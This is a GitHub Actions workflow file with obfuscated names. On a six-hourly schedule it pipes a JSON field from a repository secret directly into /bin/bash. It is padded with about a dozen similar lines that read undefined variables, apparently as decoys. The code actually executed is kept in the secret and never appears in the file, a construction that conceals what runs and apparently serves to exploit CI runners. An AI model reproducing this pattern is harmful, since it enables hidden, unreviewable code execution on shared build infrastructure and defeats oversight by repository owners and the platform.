name: mazhengfu4567
on:
  workflow_dispatch:
  schedule:
    - cron: '45 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mazhengfu4567
        env:
          q7398: ${{ secrets.q7398 }}
        run: |
          echo $q7398 | jq -r .yigk398 | /bin/bash
          echo $oaktv966 | jq -r .ie25 | /bin/bash
          echo $ge86993 | jq -r .qam1645 | /bin/bash
          echo $qms2 | jq -r .iki98 | /bin/bash
          echo $qeyuh1 | jq -r .su01625 | /bin/bash
          echo $kue2569 | jq -r .wdfga9174 | /bin/bash
          echo $baqy16025 | jq -r .jeuyw92 | /bin/bash
          echo $olz84 | jq -r .ltv6 | /bin/bash
          echo $sk05578 | jq -r .yi05733 | /bin/bash
          echo $gmwqu39 | jq -r .wpl954 | /bin/bash
          echo $cqh769 | jq -r .rdons851 | /bin/bash
          echo $wnm34602 | jq -r .ylyy295 | /bin/bash

